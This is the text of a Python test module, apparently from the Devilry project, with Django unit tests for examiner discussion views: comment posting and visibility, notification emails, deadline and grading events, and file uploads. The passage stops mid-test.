| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031746
| false
| 0
| 0.031746
| 0
| 0.095238
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d86f1aca3b3d3d346e836d765c307e9ed36de05
| 50,866
|
py
|
Python
|
devilry/devilry_group/tests/test_feedbackfeed/examiner/test_feedbackfeed_examiner_discuss.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 29
|
2015-01-18T22:56:23.000Z
|
2020-11-10T21:28:27.000Z
|
devilry/devilry_group/tests/test_feedbackfeed/examiner/test_feedbackfeed_examiner_discuss.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 786
|
2015-01-06T16:10:18.000Z
|
2022-03-16T11:10:50.000Z
|
devilry/devilry_group/tests/test_feedbackfeed/examiner/test_feedbackfeed_examiner_discuss.py
|
devilry/devilry-django
|
9ae28e462dfa4cfee966ebacbca04ade9627e715
|
[
"BSD-3-Clause"
] | 15
|
2015-04-06T06:18:43.000Z
|
2021-02-24T12:28:30.000Z
|
# -*- coding: utf-8 -*-
from datetime import timedelta
from django.core import mail
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from django.utils import timezone
from django.conf import settings
from model_bakery import baker
from devilry.devilry_comment import models as comment_models
from devilry.devilry_dbcache.customsql import AssignmentGroupDbCacheCustomSql
from devilry.devilry_group import devilry_group_baker_factories as group_baker
from devilry.devilry_group import models as group_models
from devilry.apps.core import models as core_models
from devilry.devilry_group.tests.test_feedbackfeed.mixins import mixin_feedbackfeed_examiner
from devilry.devilry_group.views.examiner import feedbackfeed_examiner
class MixinTestFeedbackfeedExaminerDiscuss(mixin_feedbackfeed_examiner.MixinTestFeedbackfeedExaminer):
def test_get_examiner_first_attempt_feedback_tab_does_not_exist_if_last_feedbackset_is_published(self):
testgroup = baker.make('core.AssignmentGroup')
group_baker.feedbackset_first_attempt_published(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertFalse(mockresponse.selector.exists('.devilry-group-feedbackfeed-feedback-button'))
def test_get_examiner_first_attempt_feedback_tab_exist_if_last_feedbackset_is_unpublished(self):
testgroup = baker.make('core.AssignmentGroup')
group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertTrue(mockresponse.selector.exists('.devilry-group-feedbackfeed-feedback-button'))
def test_get_examiner_new_attempt_feedback_tab_does_not_exist_if_last_feedbackset_is_published(self):
testgroup = baker.make('core.AssignmentGroup')
group_baker.feedbackset_new_attempt_published(
group=testgroup,
deadline_datetime=timezone.now() + timedelta(days=3))
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertFalse(mockresponse.selector.exists('.devilry-group-feedbackfeed-feedback-button'))
def test_get_examiner_new_attempt_feedback_tab_exist_if_last_feedbackset_is_unpublished(self):
testgroup = baker.make('core.AssignmentGroup')
group_baker.feedbackset_new_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertTrue(mockresponse.selector.exists('.devilry-group-feedbackfeed-feedback-button'))
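    # A posted comment must always attach to the latest feedback set, no matter
    # how many earlier (published) sets exist. The test below verifies this.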
def test_post_comment_always_to_last_feedbackset(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start',
grading_system_plugin_id=core_models.Assignment
.GRADING_SYSTEM_PLUGIN_ID_PASSEDFAILED)
group = baker.make('core.AssignmentGroup', parentnode=assignment)
examiner = baker.make('core.Examiner',
assignmentgroup=group,
relatedexaminer=baker.make('core.RelatedExaminer'))
feedbackset_first = group_baker.feedbackset_first_attempt_published(group=group)
feedbackset_last = group_baker.feedbackset_new_attempt_unpublished(group=group)
self.mock_http302_postrequest(
cradmin_role=examiner.assignmentgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': group.id},
requestkwargs={
'data': {
'text': 'This is a feedback',
'examiner_add_public_comment': 'unused value',
}
})
comments = group_models.GroupComment.objects.all()
self.assertEqual(len(comments), 1)
self.assertNotEqual(feedbackset_first, comments[0].feedback_set)
self.assertEqual(feedbackset_last, comments[0].feedback_set)
self.assertEqual(2, group_models.FeedbackSet.objects.count())
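    # Each FeedbackSetDeadlineHistory entry should render as its own
    # "deadline moved" event in the feed, for unpublished and published sets alike.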
def test_event_deadline_moved_feedbackset_unpublished(self):
testgroup = baker.make('core.AssignmentGroup')
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
now1 = timezone.now()
new_deadline1 = now1 + timedelta(days=2)
baker.make('devilry_group.FeedbackSetDeadlineHistory',
feedback_set=testfeedbackset,
changed_datetime=now1,
deadline_old=testfeedbackset.deadline_datetime,
deadline_new=new_deadline1)
now2 = timezone.now() + timedelta(days=2)
new_deadline2 = now2 + timedelta(days=4)
baker.make('devilry_group.FeedbackSetDeadlineHistory',
feedback_set=testfeedbackset,
changed_datetime=now2,
deadline_old=testfeedbackset.deadline_datetime,
deadline_new=new_deadline2)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertEqual(mockresponse.selector.count('.devilry-group-feedbackfeed-event-message__deadline-moved'), 2)
self.assertEqual(mockresponse.selector.count('.deadline-move-info'), 2)
def test_event_deadline_moved_feedbackset_published(self):
testgroup = baker.make('core.AssignmentGroup')
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
testfeedbackset = group_baker.feedbackset_first_attempt_published(group=testgroup)
now1 = timezone.now()
new_deadline1 = now1 + timedelta(days=2)
baker.make('devilry_group.FeedbackSetDeadlineHistory',
feedback_set=testfeedbackset,
changed_datetime=now1,
deadline_old=testfeedbackset.deadline_datetime,
deadline_new=new_deadline1)
now2 = timezone.now() + timedelta(days=2)
new_deadline2 = now2 + timedelta(days=4)
baker.make('devilry_group.FeedbackSetDeadlineHistory',
feedback_set=testfeedbackset,
changed_datetime=now2,
deadline_old=testfeedbackset.deadline_datetime,
deadline_new=new_deadline2)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertEqual(mockresponse.selector.count('.devilry-group-feedbackfeed-event-message__deadline-moved'), 2)
self.assertEqual(mockresponse.selector.count('.deadline-move-info'), 2)
def test_get_feedbackset_header_grading_info_passed(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
group_baker.feedbackset_first_attempt_published(group=testgroup, grading_points=1)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
)
self.assertEqual(mockresponse.selector.one('.header-grading-info').alltext_normalized, 'passed (1/1)')
def test_get_feedbackset_header_grading_info_failed(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
group_baker.feedbackset_first_attempt_published(group=testgroup, grading_points=0)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
)
self.assertEqual(mockresponse.selector.one('.header-grading-info').alltext_normalized, 'failed (0/1)')
def test_get_feedbackset_header_buttons_not_graded(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
)
self.assertEqual(
mockresponse.selector.one('.devilry-group-event__grade-move-deadline-button').alltext_normalized,
'Move deadline')
self.assertFalse(mockresponse.selector.exists('.devilry-group-event__grade-last-edit-button'))
self.assertNotContains(mockresponse.response, 'Edit grade')
self.assertFalse(mockresponse.selector.exists('.devilry-group-event__grade-last-new-attempt-button'))
self.assertNotContains(mockresponse.response, 'Give new attempt')
def test_get_feedbackset_published_move_deadline_button_not_rendered(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
group_baker.feedbackset_first_attempt_published(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
)
self.assertFalse(
mockresponse.selector.exists('.devilry-group-event__grade-move-deadline-button'))
self.assertEqual(
mockresponse.selector.one('.devilry-group-event__grade-last-edit-button').alltext_normalized,
'Edit grade')
self.assertEqual(
mockresponse.selector.one('.devilry-group-event__grade-last-new-attempt-button').alltext_normalized,
'Give new attempt')
def test_get_feedbackset_not_published_only_move_deadline_button_shows(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
)
self.assertEqual(
mockresponse.selector.one('.devilry-group-event__grade-move-deadline-button').alltext_normalized,
'Move deadline')
def test_get_feedbackset_grading_updated_multiple_events_rendered(self):
testassignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_start')
testgroup = baker.make('core.AssignmentGroup', parentnode=testassignment)
testuser = baker.make(settings.AUTH_USER_MODEL, shortname='test@example.com', fullname='Test User')
test_feedbackset = group_baker.feedbackset_first_attempt_published(group=testgroup, grading_points=1)
baker.make('devilry_group.FeedbackSetGradingUpdateHistory', feedback_set=test_feedbackset, old_grading_points=1,
updated_by=testuser)
baker.make('devilry_group.FeedbackSetGradingUpdateHistory', feedback_set=test_feedbackset, old_grading_points=0,
updated_by=testuser)
baker.make('devilry_group.FeedbackSetGradingUpdateHistory', feedback_set=test_feedbackset, old_grading_points=1,
updated_by=testuser)
baker.make('devilry_group.FeedbackSetGradingUpdateHistory', feedback_set=test_feedbackset, old_grading_points=0,
updated_by=testuser)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup
)
event_text_list = [element.alltext_normalized for element in
mockresponse.selector.list('.devilry-group-event__grading_updated')]
self.assertEqual(len(event_text_list), 4)
self.assertIn('The grade was changed from passed (1/1) to failed (0/1) by Test User(test@example.com)', event_text_list[0])
self.assertIn('The grade was changed from failed (0/1) to passed (1/1) by Test User(test@example.com)', event_text_list[1])
self.assertIn('The grade was changed from passed (1/1) to failed (0/1) by Test User(test@example.com)', event_text_list[2])
self.assertIn('The grade was changed from failed (0/1) to passed (1/1) by Test User(test@example.com)', event_text_list[3])
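# Concrete test case for the public discussion view. Comments posted through
# this view get VISIBILITY_VISIBLE_TO_EVERYONE and trigger mail to all other
# members of the group.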
class TestFeedbackfeedExaminerPublicDiscuss(TestCase, MixinTestFeedbackfeedExaminerDiscuss):
viewclass = feedbackfeed_examiner.ExaminerPublicDiscussView
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def test_get_examiner_add_comment_button(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertTrue(mockresponse.selector.exists('#submit-id-examiner_add_public_comment'))
self.assertEqual(
'Add comment',
mockresponse.selector.one('#submit-id-examiner_add_public_comment').alltext_normalized
)
def test_get_examiner_form_heading(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertTrue(mockresponse.selector.exists('.devilry-group-feedbackfeed-form-heading'))
self.assertEqual(
'Discuss with the student(s). Anything you write or upload here is visible to the student(s), '
'co-examiners (if any), and admins, but it is not considered part of your feedback/grading.',
mockresponse.selector.one('.devilry-group-feedbackfeed-form-heading').alltext_normalized
)
def test_post_comment_mail_sent_to_everyone_in_group_sanity(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
examiner_email = baker.make('devilry_account.UserEmail', user=examiner.relatedexaminer.user,
email='examiner@example.com')
# Create two examiners with mails
examiner1 = baker.make('core.Examiner', assignmentgroup=testgroup)
examiner1_email = baker.make('devilry_account.UserEmail', user=examiner1.relatedexaminer.user,
email='examiner1@example.com')
examiner2 = baker.make('core.Examiner', assignmentgroup=testgroup)
examiner2_email = baker.make('devilry_account.UserEmail', user=examiner2.relatedexaminer.user,
email='examiner2@example.com')
# Create two students with mails
student1 = baker.make('core.Candidate', assignment_group=testgroup)
student1_email = baker.make('devilry_account.UserEmail', user=student1.relatedstudent.user,
email='student1@example.com')
student2 = baker.make('core.Candidate', assignment_group=testgroup)
student2_email = baker.make('devilry_account.UserEmail', user=student2.relatedstudent.user,
email='student2@example.com')
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(len(mail.outbox), 4)
recipient_list = []
for outbox in mail.outbox:
recipient_list.append(outbox.recipients()[0])
self.assertIn(examiner1_email.email, recipient_list)
self.assertIn(examiner2_email.email, recipient_list)
self.assertIn(student1_email.email, recipient_list)
self.assertIn(student2_email.email, recipient_list)
self.assertNotIn(examiner_email.email, recipient_list)
def test_post_first_attempt_unpublished_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
def test_post_first_attempt_published_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
group_baker.feedbackset_first_attempt_published(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
def test_post_new_attempt_unpublished_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testfeedbackset = group_baker.feedbackset_new_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(2, group_models.FeedbackSet.objects.count())
last_feedbackset = group_models.FeedbackSet.objects.all()[1]
self.assertEqual(last_feedbackset, testfeedbackset)
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
def test_post_new_attempt_published_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testfeedbackset = group_baker.feedbackset_new_attempt_published(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(2, group_models.FeedbackSet.objects.count())
last_feedbackset = group_models.FeedbackSet.objects.all()[1]
self.assertEqual(last_feedbackset, testfeedbackset)
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
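# Concrete test case for the internal-notes view. Comments posted through this
# view get VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS, and mail goes to the
# other examiners only, never to students.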
class TestFeedbackfeedExaminerWithAdminDiscuss(TestCase, MixinTestFeedbackfeedExaminerDiscuss):
viewclass = feedbackfeed_examiner.ExaminerWithAdminsDiscussView
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def test_get_examiner_add_comment_button(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertTrue(mockresponse.selector.exists('#submit-id-examiner_add_comment_for_examiners_and_admins'))
self.assertEqual(
'Add note',
mockresponse.selector.one('#submit-id-examiner_add_comment_for_examiners_and_admins').alltext_normalized
)
def test_get_examiner_form_heading(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user
)
self.assertTrue(mockresponse.selector.exists('.devilry-group-feedbackfeed-form-heading'))
self.assertEqual(
'Internal notes for this student or project group. Visible only to you, your co-examiners (if any) '
'and admins. Students can not see these notes.',
mockresponse.selector.one('.devilry-group-feedbackfeed-form-heading').alltext_normalized
)
def test_post_comment_mail_only_sent_to_examiners(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
examiner_email = baker.make('devilry_account.UserEmail', user=examiner.relatedexaminer.user,
email='examiner@example.com')
# Create two examiners with mails
examiner1 = baker.make('core.Examiner', assignmentgroup=testgroup)
examiner1_email = baker.make('devilry_account.UserEmail', user=examiner1.relatedexaminer.user,
email='examiner1@example.com')
examiner2 = baker.make('core.Examiner', assignmentgroup=testgroup)
examiner2_email = baker.make('devilry_account.UserEmail', user=examiner2.relatedexaminer.user,
email='examiner2@example.com')
# Create two students with mails
student1 = baker.make('core.Candidate', assignment_group=testgroup)
student1_email = baker.make('devilry_account.UserEmail', user=student1.relatedstudent.user,
email='student1@example.com')
student2 = baker.make('core.Candidate', assignment_group=testgroup)
student2_email = baker.make('devilry_account.UserEmail', user=student2.relatedstudent.user,
email='student2@example.com')
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(len(mail.outbox), 2)
recipient_list = []
for outbox in mail.outbox:
recipient_list.append(outbox.recipients()[0])
self.assertIn(examiner1_email.email, recipient_list)
self.assertIn(examiner2_email.email, recipient_list)
self.assertNotIn(student1_email.email, recipient_list)
self.assertNotIn(student2_email.email, recipient_list)
self.assertNotIn(examiner_email.email, recipient_list)
def test_post_first_attempt_unpublished_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
group_baker.feedbackset_first_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
def test_post_first_attempt_published_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
group_baker.feedbackset_first_attempt_published(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
def test_post_new_attempt_unpublished_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testfeedbackset = group_baker.feedbackset_new_attempt_unpublished(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(2, group_models.FeedbackSet.objects.count())
last_feedbackset = group_models.FeedbackSet.objects.all()[1]
self.assertEqual(last_feedbackset, testfeedbackset)
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
def test_post_new_attempt_published_comment_with_text(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testfeedbackset = group_baker.feedbackset_new_attempt_published(group=testgroup)
examiner = baker.make('core.Examiner', assignmentgroup=testgroup)
self.mock_http302_postrequest(
cradmin_role=testgroup,
requestuser=examiner.relatedexaminer.user,
viewkwargs={'pk': testgroup.id},
requestkwargs={
'data': {
'text': 'This is a comment',
}
})
self.assertEqual(2, group_models.FeedbackSet.objects.count())
last_feedbackset = group_models.FeedbackSet.objects.all()[1]
self.assertEqual(last_feedbackset, testfeedbackset)
self.assertEqual(1, group_models.GroupComment.objects.count())
posted_comment = group_models.GroupComment.objects.all()[0]
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EXAMINER_AND_ADMINS,
posted_comment.visibility)
self.assertEqual('This is a comment', posted_comment.text)
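# File-upload tests for the public discussion view. Uploads are staged in a
# TemporaryFileCollection and referenced via temporary_file_collection_id in
# the POST data; on submit, each temporary file becomes a CommentFile.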
class TestFeedbackfeedPublicDiscussFileUploadExaminer(TestCase,
mixin_feedbackfeed_examiner.MixinTestFeedbackfeedExaminer):
viewclass = feedbackfeed_examiner.ExaminerPublicDiscussView
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def test_comment_without_text_or_file_visibility_everyone(self):
        # Test that an error message is shown when posting a comment without either text or a file.
        # Posting a comment with visibility visible to everyone.
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
testexaminer = baker.make('core.Examiner', assignmentgroup=testfeedbackset.group)
mockresponse = self.mock_http200_postrequest_htmls(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'examiner_add_public_comment': 'unused value'
}
})
self.assertEqual(0, group_models.GroupComment.objects.count())
self.assertEqual(
'A comment must have either text or a file attached, or both. An empty comment is not allowed.',
mockresponse.selector.one('#error_1_id_text').alltext_normalized)
def test_upload_single_file_visibility_everyone(self):
# Test that a CommentFile is created on upload.
# Posting comment with visibility visible to everyone
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
        testexaminer = baker.make('core.Examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfile(
user=testexaminer.relatedexaminer.user)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
self.assertEqual(1, comment_models.CommentFile.objects.count())
def test_upload_single_file_content_visibility_everyone(self):
# Test the content of a CommentFile after upload.
# Posting comment with visibility visible to everyone
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
        testexaminer = baker.make('core.Examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfiles(
file_list=[
SimpleUploadedFile(name='testfile.txt', content=b'Test content', content_type='text/txt')
],
user=testexaminer.relatedexaminer.user
)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, comment_models.CommentFile.objects.count())
comment_file = comment_models.CommentFile.objects.all()[0]
group_comment = group_models.GroupComment.objects.get(id=comment_file.comment.id)
self.assertEqual(group_comment.visibility, group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE)
self.assertEqual('testfile.txt', comment_file.filename)
self.assertEqual(b'Test content', comment_file.file.file.read())
self.assertEqual(len('Test content'), comment_file.filesize)
self.assertEqual('text/txt', comment_file.mimetype)
def test_upload_multiple_files_visibility_everyone(self):
        # Test that one CommentFile is created per uploaded file.
        # Posting a comment with visibility visible to everyone.
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
        testexaminer = baker.make('core.Examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfiles(
file_list=[
SimpleUploadedFile(name='testfile1.txt', content=b'Test content1', content_type='text/txt'),
SimpleUploadedFile(name='testfile2.txt', content=b'Test content2', content_type='text/txt'),
SimpleUploadedFile(name='testfile3.txt', content=b'Test content3', content_type='text/txt')
],
user=testexaminer.relatedexaminer.user
)
self.mock_http302_postrequest(
cradmin_role=testexaminer.assignmentgroup,
requestuser=testexaminer.relatedexaminer.user,
viewkwargs={'pk': testfeedbackset.group.id},
requestkwargs={
'data': {
'text': '',
'temporary_file_collection_id': temporary_filecollection.id
}
})
self.assertEqual(1, group_models.GroupComment.objects.count())
self.assertEqual(group_models.GroupComment.VISIBILITY_VISIBLE_TO_EVERYONE,
group_models.GroupComment.objects.all()[0].visibility)
self.assertEqual(3, comment_models.CommentFile.objects.count())
def test_upload_multiple_files_contents_visibility_everyone(self):
        # Test the content of each CommentFile after upload.
testfeedbackset = group_baker.feedbackset_first_attempt_unpublished(
group__parentnode__parentnode=baker.make_recipe('devilry.apps.core.period_active'))
        testexaminer = baker.make('core.Examiner', assignmentgroup=testfeedbackset.group)
temporary_filecollection = group_baker.temporary_file_collection_with_tempfiles(
file_list=[
SimpleUploadedFile(name='testfile1.txt', content=b'Test content1', content_type='text/txt'),
SimpleUploadedFile(name='testfile2.txt', content=b'Test content2', content_type='text/txt'),
SimpleUploadedFile(name='testfile3.txt', content=b'Test content3', content_type='text/txt')
],
user=testexaminer.relatedexaminer.user
)
self.mock_http302_postrequest(
